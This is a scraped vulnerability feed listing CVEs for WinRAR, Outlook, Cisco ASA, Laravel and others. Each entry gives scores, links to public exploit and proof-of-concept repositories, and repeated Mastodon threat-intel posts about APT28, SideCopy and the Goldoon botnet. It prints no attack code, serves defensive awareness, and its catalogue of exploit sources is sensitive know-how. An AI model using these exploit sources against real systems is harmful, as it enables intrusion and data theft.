https://github.com/Nielk74/CVE-2023-38831

https://github.com/s4m98/winrar-cve-2023-38831-poc-gen

https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit

https://github.com/elefantesagradodeluzinfinita/cve-2023-38831

https://github.com/kehrijksen/CVE-2023-38831

https://github.com/an040702/CVE-2023-38831

https://github.com/K3rnel-Dev/WinrarExploit

https://github.com/ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc

https://github.com/SugiB3o/Keylog_CVE2023-38831

https://github.com/h3xecute/SideCopy-Exploits-CVE-2023-38831

https://github.com/PascalAsch/CVE-2023-38831-KQL

https://github.com/xaitax/WinRAR-CVE-2023-38831

https://github.com/akhomlyuk/cve-2023-38831

https://github.com/IMHarman/CVE-2023-38831

https://github.com/MortySecurity/CVE-2023-38831-Exploit-and-Detection

https://github.com/80r1ng/CVE-2023-38831-EXP

https://github.com/z3r0sw0rd/CVE-2023-38831-PoC

https://github.com/r1yaz/winDED

https://github.com/BeniB3astt/CVE-2023-38831_ReverseShell_Winrar

https://github.com/youmulijiang/evil-winrar

https://github.com/RomainBayle08/CVE-2023-38831

https://github.com/GOTonyGO/CVE-2023-38831-winrar

https://github.com/thegr1ffyn/CVE-2023-38831

https://github.com/Garck3h/cve-2023-38831

https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC

https://github.com/ignis-sec/CVE-2023-38831-RaRCE

https://github.com/HDCE-inc/CVE-2023-38831

https://github.com/asepsaepdin/CVE-2023-38831

https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC

https://github.com/sh770/CVE-2023-38831

https://github.com/malvika-thakur/CVE-2023-38831

https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831

https://github.com/Malwareman007/CVE-2023-38831

https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc

https://github.com/b1tg/CVE-2023-38831-winrar-exploit

https://github.com/MyStuffYT/CVE-2023-38831-POC

https://github.com/xk-mt/WinRAR-Vulnerability-recurrence-tutorial

https://github.com/SpamixOfficial/CVE-2023-38831

oversecurity@mastodon.social at 2024-04-29T16:24:09.000Z ##

CVE-2023-38831 Exploited by Pro-Russia Hacking Groups in RU-UA Conflict Zone for Credential Harvesting Operations

By Cluster25 Threat Intel TeamOctober 12, 2023

🔗️ [Duskrise] link.is.it/a27zga

##

screaminggoat at 2024-04-29T15:11:36.905Z ##

Cyble: Threat Actor profile: SideCopy (note: email paywall)
Cyble provides a threat actor profile of SideCopy, a Pakistani advanced persistent threat (APT) that primarily targeted South Asian countries (India especially). Cyble states that they were exclusively targeting Indian defense forces and armed forces personnel since early 2019. "Notably, nearly all C2 infrastructure is attributed to Contabo GmbH, and network infrastructure has similarities with the Transparent Tribe APT." Cyble describes the cyber kill chain, exploited vulnerabilities (CVE-2023-38831), and known tools used. No IOC.

##

oversecurity@mastodon.social at 2024-04-29T16:24:09.000Z ##

CVE-2023-38831 Exploited by Pro-Russia Hacking Groups in RU-UA Conflict Zone for Credential Harvesting Operations

By Cluster25 Threat Intel TeamOctober 12, 2023

🔗️ [Duskrise] link.is.it/a27zga

##

screaminggoat@infosec.exchange at 2024-04-29T15:11:36.000Z ##

Cyble: Threat Actor profile: SideCopy (note: email paywall)
Cyble provides a threat actor profile of SideCopy, a Pakistani advanced persistent threat (APT) that primarily targeted South Asian countries (India especially). Cyble states that they were exclusively targeting Indian defense forces and armed forces personnel since early 2019. "Notably, nearly all C2 infrastructure is attributed to Contabo GmbH, and network infrastructure has similarities with the Transparent Tribe APT." Cyble describes the cyber kill chain, exploited vulnerabilities (CVE-2023-38831), and known tools used. No IOC.

#cyberespionage #SideCopy #Pakistan #APT #threatintel

##

CVE-2020-3259
(7.5 HIGH)

EPSS: 1.93%

updated 2023-08-16T18:30:19

2 posts

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs

GossiTheDog@cyberplace.social at 2024-04-24T18:13:38.000Z ##

In light of recent events, probably best to make this ASA vuln public in public interest: github.com/GossiTheDog/Exploit

If you get <argument> back with toke inside, not vuln. If you get a memory dump back, you vuln. The dump is pretty bad as it contains a bunch of stuff.

The path exists even with webvpn disabled, it's the host checker.

Credits to person who found it, don't know if they want to be named. Edit: it’s @Naproxen

Akira and others have been living off this for a while.

##

GossiTheDog@cyberplace.social at 2024-04-24T18:13:38.000Z ##

In light of recent events, probably best to make this ASA vuln public in public interest: github.com/GossiTheDog/Exploit

If you get <argument> back with toke inside, not vuln. If you get a memory dump back, you vuln. The dump is pretty bad as it contains a bunch of stuff.

The path exists even with webvpn disabled, it's the host checker.

Credits to person who found it, don't know if they want to be named. Edit: it’s @Naproxen

Akira and others have been living off this for a while.

##

CVE-2023-1389
(8.8 HIGH)

EPSS: 6.88%

updated 2023-08-11T15:15:09.760000

1 posts

TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would

2 repos

https://github.com/Terminal1337/CVE-2023-1389

https://github.com/Voyag3r-Security/CVE-2023-1389

CVE-2021-26085
(5.3 MEDIUM)

EPSS: 96.32%

updated 2023-08-08T14:22:24.967000

4 posts

Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.

Nuclei template

2 repos

https://github.com/ColdFusionX/CVE-2021-26085

https://github.com/zeroc00I/CVE-2021-26085

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2023-32054
(7.3 HIGH)

EPSS: 0.04%

updated 2023-07-13T19:55:55.293000

2 posts

Volume Shadow Copy Elevation of Privilege Vulnerability

screaminggoat at 2024-04-22T13:54:40.550Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

##

simontsui@infosec.exchange at 2024-04-22T13:54:40.000Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

#MagicDot #CVE_2023_42757 #CVE_2023_32054 #CVE_2023_36396

##

CVE-2023-21746
(7.8 HIGH)

EPSS: 0.04%

updated 2023-04-27T19:15:14.917000

2 posts

Windows NTLM Elevation of Privilege Vulnerability

1 repos

https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746

oversecurity@mastodon.social at 2024-04-29T16:12:06.000Z ##

LocalPotato HTTP edition

Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP...

🔗️ [Decoder] link.is.it/ikv1ph

##

oversecurity@mastodon.social at 2024-04-29T16:12:06.000Z ##

LocalPotato HTTP edition

Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP...

🔗️ [Decoder] link.is.it/ikv1ph

##

CVE-2015-2051
(0 None)

EPSS: 97.14%

updated 2023-04-26T19:27:52.350000

6 posts

The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.

screaminggoat at 2024-05-01T16:44:50.283Z ##

Fortinet: New "Goldoon" Botnet Targeting D-Link Devices
FortiGuard Labs observed a new botnet (dubbed Goldoon) targeting CVE-2015-2051 (CVSSv2 10.0 critical, disclosed 13 February 2015, added to CISA KEV Catalog 10 Feb 2022) D-Link DIR-645 Router Remote Code Execution Vulnerability. Goldoon botnet activity spiked in April 2024. Fortinet explains the infection chain, from dropper to downloader to Goldoon payload. This article includes C2 communication, attack methods, and IOC.

##

screaminggoat@infosec.exchange at 2024-05-01T16:44:50.000Z ##

Fortinet: New "Goldoon" Botnet Targeting D-Link Devices
FortiGuard Labs observed a new botnet (dubbed Goldoon) targeting CVE-2015-2051 (CVSSv2 10.0 critical, disclosed 13 February 2015, added to CISA KEV Catalog 10 Feb 2022) D-Link DIR-645 Router Remote Code Execution Vulnerability. Goldoon botnet activity spiked in April 2024. Fortinet explains the infection chain, from dropper to downloader to Goldoon payload. This article includes C2 communication, attack methods, and IOC.

#Goldoon #DLink #CVE_2015_2051 #botnet #cybercrime #IOC #threatintel

##

screaminggoat at 2024-05-01T16:44:50.283Z ##

Fortinet: New "Goldoon" Botnet Targeting D-Link Devices
FortiGuard Labs observed a new botnet (dubbed Goldoon) targeting CVE-2015-2051 (CVSSv2 10.0 critical, disclosed 13 February 2015, added to CISA KEV Catalog 10 Feb 2022) D-Link DIR-645 Router Remote Code Execution Vulnerability. Goldoon botnet activity spiked in April 2024. Fortinet explains the infection chain, from dropper to downloader to Goldoon payload. This article includes C2 communication, attack methods, and IOC.

##

screaminggoat@infosec.exchange at 2024-05-01T16:44:50.000Z ##

Fortinet: New "Goldoon" Botnet Targeting D-Link Devices
FortiGuard Labs observed a new botnet (dubbed Goldoon) targeting CVE-2015-2051 (CVSSv2 10.0 critical, disclosed 13 February 2015, added to CISA KEV Catalog 10 Feb 2022) D-Link DIR-645 Router Remote Code Execution Vulnerability. Goldoon botnet activity spiked in April 2024. Fortinet explains the infection chain, from dropper to downloader to Goldoon payload. This article includes C2 communication, attack methods, and IOC.

#Goldoon #DLink #CVE_2015_2051 #botnet #cybercrime #IOC #threatintel

##

VirusBulletin at 2024-05-02T08:26:43.483Z ##

In their latest article Fortinet's Cara Lin & Vincent Li provide detailed insights into the propagation and actions of the Goldoon botnet targeting D-Link devices vulnerable to CVE-2015-2051. fortinet.com/blog/threat-resea

##

VirusBulletin@infosec.exchange at 2024-05-02T08:26:43.000Z ##

In their latest article Fortinet's Cara Lin & Vincent Li provide detailed insights into the propagation and actions of the Goldoon botnet targeting D-Link devices vulnerable to CVE-2015-2051. fortinet.com/blog/threat-resea

##

CVE-2022-37955
(7.8 HIGH)

EPSS: 0.06%

updated 2023-04-11T21:15:13.240000

2 posts

Windows Group Policy Elevation of Privilege Vulnerability

oversecurity@mastodon.social at 2024-04-29T16:11:14.000Z ##

EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955

Summary A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy...

🔗️ [Decoder] link.is.it/wewm9y

##

oversecurity@mastodon.social at 2024-04-29T16:11:14.000Z ##

EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955

Summary A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy...

🔗️ [Decoder] link.is.it/wewm9y

##

CVE-2023-21036
(5.5 MEDIUM)

EPSS: 0.04%

updated 2023-04-06T05:08:38

1 posts

In BitmapExport.java, there is a possible failure to truncate images due to a logic error in the code.Product: AndroidVersions: Android kernelAndroid ID: A-264261868References: N/A

6 repos

https://github.com/infobyte/CVE-2023-21036

https://github.com/qixils/AntiCropalypse

https://github.com/frankthetank-music/Acropalypse-Multi-Tool

https://github.com/notaSWE/gocropalypse

https://github.com/lordofpipes/acropadetect

https://github.com/L1-0/codestuff

CVE-2023-23397
(9.8 CRITICAL)

EPSS: 92.64%

updated 2023-03-29T05:07:23

4 posts

Microsoft Outlook Elevation of Privilege Vulnerability

29 repos

https://github.com/tiepologian/CVE-2023-23397

https://github.com/SecCTechs/CVE-2023-23397

https://github.com/ahmedkhlief/CVE-2023-23397-POC

https://github.com/madelynadams9/CVE-2023-23397-Report

https://github.com/securiteinfo/expl_outlook_cve_2023_23397_securiteinfo.yar

https://github.com/moneertv/CVE-2023-23397

https://github.com/Zeppperoni/CVE-2023-23397-Patch

https://github.com/vlad-a-man/CVE-2023-23397

https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY

https://github.com/ducnorth2712/CVE-2023-23397

https://github.com/alicangnll/CVE-2023-23397

https://github.com/djackreuter/CVE-2023-23397-PoC

https://github.com/api0cradle/CVE-2023-23397-POC-Powershell

https://github.com/Trackflaw/CVE-2023-23397

https://github.com/ka7ana/CVE-2023-23397

https://github.com/Pushkarup/CVE-2023-23397

https://github.com/BronzeBee/cve-2023-23397

https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397

https://github.com/ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook

https://github.com/j0eyv/CVE-2023-23397

https://github.com/BillSkiCO/CVE-2023-23397_EXPLOIT

https://github.com/im007/CVE-2023-23397

https://github.com/jacquesquail/CVE-2023-23397

https://github.com/grn-bogo/CVE-2023-23397

https://github.com/alsaeroth/CVE-2023-23397-POC

https://github.com/TheUnknownSoul/CVE-2023-23397-PoW

https://github.com/cleverg0d/CVE-2023-23397-PoC-PowerShell

https://github.com/stevesec/CVE-2023-23397

https://github.com/CKevens/CVE-2023-23397-POC

screaminggoat at 2024-05-03T16:43:10.971Z ##

U.S. Department of State: The United States Condemns Malicious Cyber Activity Targeting Germany, Czechia, and Other EU Member States
The United States joins Germany and Czech Republic in condemning Russian Federation and APT28 for the 2023 cyberattacks against Germany, Czechia, Lithuania, Poland, Slovakia, and Sweden. "Russia’s pattern of behavior blatantly disregards the Framework for Responsible State Behavior in Cyberspace, as affirmed by all United Nations Member States."
The U.S. State Department is the only goverment agency that discloses the "previously unknown" Outlook vulnerability as CVE-2023-23397.

h/t @w7voa

##

screaminggoat at 2024-05-03T13:22:14.814Z ##

The Guardian: Germany summons Russian envoy over 2023 cyber-attacks
Germany attributed a series of cyberattacks against the defense and technology sector in 2023 to Russian military intelligence, specifically APT28. APT28, aka Forest Blizzard, and Fancy Bear, is attributed to the Russian Main Intelligence Directorate (GRU) Military Unit 26165 by the U.S. Government. "It exploited a then unknown vulnerability in the Microsoft Outlook email service and, according to German officials, compromised the servers of affected companies." While the Guardian doesn't identify the Outlook vulnerability, it is likely CVE-2023-23397 (9.8 critical, disclosed 14 March 2023 by Microsoft as an exploited zero-day, added to KEV Catalog same day) which Microsoft linked its exploitation to APT28.

##

screaminggoat@infosec.exchange at 2024-05-03T16:43:10.000Z ##

U.S. Department of State: The United States Condemns Malicious Cyber Activity Targeting Germany, Czechia, and Other EU Member States
The United States joins Germany and Czech Republic in condemning Russian Federation and APT28 for the 2023 cyberattacks against Germany, Czechia, Lithuania, Poland, Slovakia, and Sweden. "Russia’s pattern of behavior blatantly disregards the Framework for Responsible State Behavior in Cyberspace, as affirmed by all United Nations Member States."
The U.S. State Department is the only goverment agency that discloses the "previously unknown" Outlook vulnerability as CVE-2023-23397.

h/t @w7voa

#Czech #Germany #CzechRepublic #Russia #cyberespionage #APT28 #news #CVE_2023_23397 #vulnerability #eitw #Outlook #USStateDept

##

screaminggoat@infosec.exchange at 2024-05-03T13:22:14.000Z ##

The Guardian: Germany summons Russian envoy over 2023 cyber-attacks
Germany attributed a series of cyberattacks against the defense and technology sector in 2023 to Russian military intelligence, specifically APT28. APT28, aka Forest Blizzard, and Fancy Bear, is attributed to the Russian Main Intelligence Directorate (GRU) Military Unit 26165 by the U.S. Government. "It exploited a then unknown vulnerability in the Microsoft Outlook email service and, according to German officials, compromised the servers of affected companies." While the Guardian doesn't identify the Outlook vulnerability, it is likely CVE-2023-23397 (9.8 critical, disclosed 14 March 2023 by Microsoft as an exploited zero-day, added to KEV Catalog same day) which Microsoft linked its exploitation to APT28.

#Germany #Russia #APT28 #ForestBlizzard #cyberespionage #CVE_2023_23397 #news

##

CVE-2022-38028
(7.8 HIGH)

EPSS: 0.05%

updated 2023-02-03T05:02:37

15 posts

Windows Print Spooler Elevation of Privilege Vulnerability.

screaminggoat at 2024-04-23T15:32:24.451Z ##

@ntkramer gonna enrich your toot with my reply: Microsoft article
What I took out of it was APT28's tool GooseEgg exploited CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months to 3 years 6 months.

To that end, CISA added CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog today: cisa.gov/news-events/alerts/20

##

screaminggoat at 2024-04-23T15:00:13.500Z ##

Hot off the press! CISA adds CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog after Microsoft's blog post states that Russian APT28 exploited it as a zero-day for years. 🔗cisa.gov/news-events/alerts/20

##

jos1264@social.skynetcloud.site at 2024-04-23T14:35:04.000Z ##

Russian hackers’ custom tool exploits old Windows Print Spooler flaw (CVE-2022-38028) helpnetsecurity.com/2024/04/23 #cyberespionage #Don'tmiss #Microsoft #Hotstuff #exploit #Windows #0-day #News #APT #CVE

##

jbhall56 at 2024-04-23T11:49:48.287Z ##

The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8). thehackernews.com/2024/04/russ

##

screaminggoat at 2024-04-22T18:47:57.544Z ##

@mttaggart I think one of the key takeaways is that APT28, a Russian state actor publicly attributed to GRU Military Unit 26165, exploited CVE-2022-38028 as a zero-day for 2 years before it was publicly disclosed and patched:

Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.

##

cR0w at 2024-04-22T18:40:23.488Z ##

@dangoodin Should your post read CVE-2022-38028?

##

dangoodin at 2024-04-22T17:43:54.694Z ##

Microsoft said today that Russian hackers have been exploiting the vulnerability tracked as CVE-2022-38028 since at least 2020. That would make it an 0day at the time Microsoft patched it in October 2022. And yet, Microsoft has never acknowledged that vulnerability as such. What's up with that?

microsoft.com/en-us/security/b

msrc.microsoft.com/update-guid

##

screaminggoat at 2024-04-22T16:54:45.253Z ##

Microsoft reported that APT28 (Fancy Bear, Forest Blizzard) used a custom tool to elevate privileges and steal credentials in compromised networks. This GooseEgg tool leveraged CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months. APT28 is publicly attributed to Russian General Staff Main Intelligence Directorate (GRU). IOC provided. 🔗 microsoft.com/en-us/security/b

cc: @serghei @campuscodi @briankrebs @jwarminsky

##

screaminggoat@infosec.exchange at 2024-04-23T15:32:24.000Z ##

@ntkramer gonna enrich your toot with my reply: Microsoft article
What I took out of it was APT28's tool GooseEgg exploited CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months to 3 years 6 months.

To that end, CISA added CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog today: cisa.gov/news-events/alerts/20

#CVE_2022_38028 #APT28 #KEV

##

screaminggoat@infosec.exchange at 2024-04-23T15:00:13.000Z ##

Hot off the press! CISA adds CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog after Microsoft's blog post states that Russian APT28 exploited it as a zero-day for years. 🔗cisa.gov/news-events/alerts/20

#CVE_2022_38028 #eitw #activeexploitation #kev #CISA #KnownExploitedVulnerabilitiesCatalog #Russia #cyberespionage #threatintel

##

jbhall56@infosec.exchange at 2024-04-23T11:49:48.000Z ##

The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8). thehackernews.com/2024/04/russ

##

simontsui@infosec.exchange at 2024-04-22T18:47:57.000Z ##

@mttaggart I think one of the key takeaways is that APT28, a Russian state actor publicly attributed to GRU Military Unit 26165, exploited CVE-2022-38028 as a zero-day for 2 years before it was publicly disclosed and patched:

Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.

##

cR0w@infosec.exchange at 2024-04-22T18:40:23.000Z ##

@dangoodin Should your post read CVE-2022-38028?

##

dangoodin@infosec.exchange at 2024-04-22T17:43:54.000Z ##

Microsoft said today that Russian hackers have been exploiting the vulnerability tracked as CVE-2022-38028 since at least 2020. That would make it an 0day at the time Microsoft patched it in October 2022. And yet, Microsoft has never acknowledged that vulnerability as such. What's up with that?

microsoft.com/en-us/security/b

msrc.microsoft.com/update-guid

##

simontsui@infosec.exchange at 2024-04-22T16:54:45.000Z ##

Microsoft reported that APT28 (Fancy Bear, Forest Blizzard) used a custom tool to elevate privileges and steal credentials in compromised networks. This GooseEgg tool leveraged CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months. APT28 is publicly attributed to Russian General Staff Main Intelligence Directorate (GRU). IOC provided. 🔗 microsoft.com/en-us/security/b

cc: @serghei @campuscodi @briankrebs @jwarminsky

#APT28 #cyberespionage #Russia #FancyBear #ForestBlizzard #CVE_2022_38028 #eitw #activeexploitation #GooseEgg

##

CVE-2017-8570
(7.8 HIGH)

EPSS: 97.34%

updated 2023-02-02T05:01:39

4 posts

Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243.

9 repos

https://github.com/rxwx/CVE-2017-8570

https://github.com/sasqwatch/CVE-2017-8570

https://github.com/erfze/CVE-2017-8570

https://github.com/Drac0nids/CVE-2017-8570

https://github.com/5l1v3r1/rtfkit

https://github.com/erfze/CVE-2017-0261

https://github.com/MaxSecurity/Office-CVE-2017-8570

https://github.com/SwordSheath/CVE-2017-8570

https://github.com/temesgeny/ppsx-file-generator

jbhall56 at 2024-04-29T11:49:15.137Z ##

The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. darkreading.com/cyberattacks-d

##

screaminggoat at 2024-04-27T13:36:40.270Z ##

Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.

##

jbhall56@infosec.exchange at 2024-04-29T11:49:15.000Z ##

The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. darkreading.com/cyberattacks-d

##

screaminggoat@infosec.exchange at 2024-04-27T13:36:40.000Z ##

Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.

#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570

##

CVE-2021-3129
(9.8 CRITICAL)

EPSS: 97.46%

updated 2023-02-01T05:05:19

2 posts

Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.

Nuclei template

28 repos

https://github.com/joshuavanderpoll/CVE-2021-3129

https://github.com/hupe1980/CVE-2021-3129

https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129

https://github.com/Axianke/CVE-2021-3129

https://github.com/SNCKER/CVE-2021-3129

https://github.com/ambionics/laravel-exploits

https://github.com/nth347/CVE-2021-3129_exploit

https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner

https://github.com/ajisai-babu/CVE-2021-3129-exp

https://github.com/zhzyker/CVE-2021-3129

https://github.com/zhzyker/vulmap

https://github.com/withmasday/CVE-2021-3129

https://github.com/aurelien-vilminot/ENSIMAG_EXPLOIT_CVE2_3A

https://github.com/idea-oss/laravel-CVE-2021-3129-EXP

https://github.com/miko550/CVE-2021-3129

https://github.com/JacobEbben/CVE-2021-3129

https://github.com/0nion1/CVE-2021-3129

https://github.com/simonlee-hello/CVE-2021-3129

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

https://github.com/qaisarafridi/cve-2021-3129

https://github.com/MadExploits/Laravel-debug-Checker

https://github.com/cuongtop4598/CVE-2021-3129-Script

https://github.com/qaisarafridi/cve-2021-31290

https://github.com/knqyf263/CVE-2021-3129

https://github.com/shadowabi/Laravel-CVE-2021-3129

https://github.com/keyuan15/CVE-2021-3129

https://github.com/Zoo1sondv/CVE-2021-3129

https://github.com/crisprss/Laravel_CVE-2021-3129_EXP

screaminggoat at 2024-04-25T14:29:48.036Z ##

Sysdig: LLMjacking: Stolen Cloud Credentials Used in New AI Attack
